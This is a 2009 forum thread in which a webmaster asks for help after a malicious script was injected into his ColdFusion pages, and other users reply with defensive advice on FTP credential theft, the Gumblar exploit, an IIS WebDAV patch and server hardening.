Skip to main content
A
adamscreek
Participant
June 10, 2009
Answered

Script injection on .cfm pages

  • June 10, 2009
  • 5 replies
  • 858 views

I need help. For the second time in three months every single .cfm page has a malicous cross-site script appended to the orginal code. It looks something like this:

I'm having a really hard time trying to figure out where this might be coming from, or where the vulnerability is. Has anyone been affected by the same scripting attack? I'm running a windows 2003 server, fusebox 4.0 framework on MS SQL database. Thanks for any help or any leds that might help solve this problem!

    This topic has been closed for replies.
    Correct answer Ken_Ford_-_ACP-QFo4AB

    This is what you have:

    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

    Ken Ford
    Adobe Community Expert - Dreamweaver/ColdFusion
    Adobe Certified Expert - Dreamweaver CS4
    Adobe Certified Expert - ColdFusion 8
    Fordwebs, LLC
    http://www.fordwebs.com
    http://www.cfnoob.com

    5 replies

    ilssac
    ilssac
    Inspiring
    June 10, 2009
    Another item to be aware of is the recent HUGE security hole on IIS servers with WebDAV enabled.  MS released a patch just yesterday to this problem that basically let any user to ascess any file on any IIS server that had WebDAV turned on.

    REFERENCES:

    Microsoft:
    http://www.microsoft.com/windowsserver2003/iis/default.mspx
    http://www.microsoft.com/technet/security/advisory/971492.mspx
    http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b037954-441d-4037-a111-94df7880c319.mspx?mfr=truehttp://support.microsoft.com/default.aspx/kb/325864http://support.microsoft.com/kb/311350

    http://support.microsoft.com/?id=271071
    http://support.microsoft.com/kb/812614/

    Secunia:
    http://secunia.com/advisories/35109/
    A
    adamscreekAuthor
    Participant
    June 10, 2009

    Thanks for the great leads everybody.

    So it really sounds like the preferred method of entry here is compromised FTP accounts? The server I'm hosting my websites on is a VPS solution and only has a handful of FTP accounts. For the time being I've disabled those accounts, and enabled logging for the FTP server. Once things are cleaned up, I'll restrict the ftp accoutns to the user IPs. Please, keep the information coming - this has been really helpful.

    T
    TLC-IT
    Inspiring
    June 10, 2009

    This problem is necessarily caused by modification of the server-side script files.  Therefore, it is necessary that the server must have been compromised.  On a shared server, this is "more or less to be expected," since hundreds if not thousands of people other than yourself have accounts on the same server(s).  However, there is a lot that you can do to preven it:  it only takes a couple of extra steps.

    1. Always use sftp (secure FTP) to transfer files and to establish host sessions.  Many hosting companies allow you to disable non-secure FTP, and you should do so.
    2. Protect your username/password as robustly as you can.  "password1234" is an extremely common password, as is "password." 
    3. After transferring files to your computer, use chown (Unix), cacls (Windows), or its equivalent to secure the files against anyone, including yourself.  (You can always countermand your directives later, the next time you're ready to update the site.)  This will at-least require the intruder to have compromised your account, not someone else's.
    4. In that same vein, don't forget to secure all of the parent directories!  "It'll do no damn good at all" if the intruder can replace your carefully-secured directory, in its entirety, with an altered one!
    5. Make backups!
    6. If your site permits any sort of user-contributed content to be provided, make absolutely sure it is well-filtered.
    7. "Think like a pirate."  ("RRRRRrrrrrrrr!!")  Web-site compromises are always "crimes of opportunity."  Many a cat-burglar has made a good living by trying each door in a neighborhood while carrying a pizza box.
    Ken_Ford_-_ACP-QFo4AB
    Ken_Ford_-_ACP-QFo4ABCorrect answer
    Inspiring
    June 10, 2009

    This is what you have:

    http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

    Ken Ford
    Adobe Community Expert - Dreamweaver/ColdFusion
    Adobe Certified Expert - Dreamweaver CS4
    Adobe Certified Expert - ColdFusion 8
    Fordwebs, LLC
    http://www.fordwebs.com
    http://www.cfnoob.com

    M
    mack_
    Participating Frequently
    June 10, 2009

    My experience is that the attack happens because some developer

    machines are compromised: a trojan on the developer machine can

    "steal" FTP usernames and passwords, connect to the FTP accounts and

    modify the files.

    Check your FTP logs for modifications to the files, change the FTP

    usernames and passwords for the site, scan the computers that are

    making FTP connections to the site.

    Mack

    Terms & ConditionsAccessibility statement
    Using the community Terms of use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices